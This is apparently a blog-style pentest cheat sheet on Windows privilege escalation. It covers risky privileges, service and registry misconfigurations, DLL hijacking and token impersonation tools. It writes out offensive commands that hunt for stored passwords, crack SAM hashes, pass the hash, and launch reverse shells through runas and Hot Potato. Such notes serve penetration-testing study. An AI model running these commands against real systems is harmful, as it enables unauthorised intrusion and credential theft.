---
title: Windows Privilege Escalation
author: Devin Cudnohufsky
date: 2021-05-18 00:00:00 +0500
categories: [Techniques]
tags: []
---

## Tools

1. [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

## User

`whoami`

## User Privileges 

`whoami /priv`

### Important Privileges

1. SeImpersonatePrivilege
    - User can impersonate the token of any access token  (find system/admin access token)
1. SeAssignPrimaryPrivilege
    - User can assign access token to a new process
1. SeBackupPrivilege
    - Read access to any file on system regardless of ACL
1. SeRestorePrivilege
    - Write access to any file on system regardless of ACL
1. SeTakeOwnershipPrivilege
    - User can take ownership of any file. Once you own the file, you can grant yourself write permissions
1. Advanced permissions to look out for
    1. SeTcbPrivilege
    1. SeCreateTokenPrivilege
    1. SeLoadDriverPrivilege
    1. SeDebugPrivilege

## Service

### Insecure Service Permissions

If a user has permissions to change a service configuration (+stop/start) that runs as SYSTEM, the .exe can be changed to your own program.

### Unquoted Service Path

If a service doesn't use quotes. The  service will be ambigous and windows will try all possibilities in order. e.g. `C:\User\My User Name\My Script.exe InputOne` Will check for `C:\User\My.exe` first with the rest as an argument passed to it

### Weak Registry Permissions

If you are able to modify a registry entry of a service that runs as SYSTEM, you could substitute its binary for your own.

### Weak File Permissions

> Consider taking a copy of the .exe prior to overwriting

If you can write to an executable that runs as SYSTEM, you can overwrite it with your own.

### DLL Hijacking

1. You have write permissions to a DLL that is loaded into a service running as SYSTEM
1. You have write permissions to a directory of a missing DLL

## Registry

### Autoruns

Autoruns are placed in the registry and will run after a reboot. If you have write perms to an autostart program, you can replace it.

### AlwaysInstallElevated

`HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer`
`HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`

If both exist and have AlwaysInstallElevated enabled (1), you can use a mallicious MSI for privesc

## Stored Password

### Registry

The windows registry sometimes contains passwords in plaintext. Note: lots of results from the below commands. Sometimes better to check know location like auto login or putty.

1. `reg query HKLM /f password /t REG_SZ /s`
1. `reg query HKCU /f password /t REG_SZ /s`

### Saved Credentials

1. `cmdkey /list`
1. `runas /savecred /user:<admin user> C:\<reverse shell>`

### Configuration Files

Example: Unattend.xml for windows unattended setup

1. `dir /s *pass* == *.config`
1. `findstr /si password *.xml *.ini *.txt`

### SAM

The SAM is locked while the system is running but backups can sometimes be found in:
    - `C:\Windows\Repair`
    - `C:\Windows\System32\config\RegBack`

You'll need both the SAM file and the SYSTEM file. SAM will have encrypted passwords and the SYSTEM file will have the key to decrypt them.

- `pwdump` on Kali
- `hashcat -m 1000 --force <admin hash> /usr/share/wordlists/rockyou.txt`

## Pass the Hash

`Pth-winexe --system -U 'admin%<LM Hash>:<NTLM Hash> //<reverse ip> cmd.exe'`

## Scheduled Tasks

1. CMD: `schtasks /query /fo LIST /v`
1. PowerShell: `Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State`

## Insecure GUI Apps

Look for an app that runs as admin. Then:
    1. File->open: `file://c:\windows\system32\cmd.exe`

## Startup Apps

If you can write to `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`, when an admin logs in, the script will run with admin privileges.

## Installed Apps

Look for installed applications and then search exploit db for exploits.

## Hot Potato

NTLM authentication to fake HTTP then relay creds to SMB for command execution
`.\potato.exe -ip <IP> -cmd <reverse shell> -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true`

## Token Impersonation

While connected as a exploited service account that has impersonation privileges see the following exploits

1. [Juicy Potato](https://github.com/ohpe/juicy-potato)
1. [Rogue Potato](https://github.com/antonioCoco/RoguePotato)
1. [PrintSpoofer](https://github.com/itm4n/PrintSpoofer)

## Port Forwarding

`Plink.exe`

## Kernel 

> Use only as a last resort

`sysinfo`

1. Search for exploits on:
    1. Google
    1. ExploitDB
    1. GitHub
1. Tools
    1. [Windows Exploit Suggester](https://github.com/bitsadmin/wesng)
    1. [Watson by Rasta-Mouse](https://github.com/rasta-mouse/Watson)
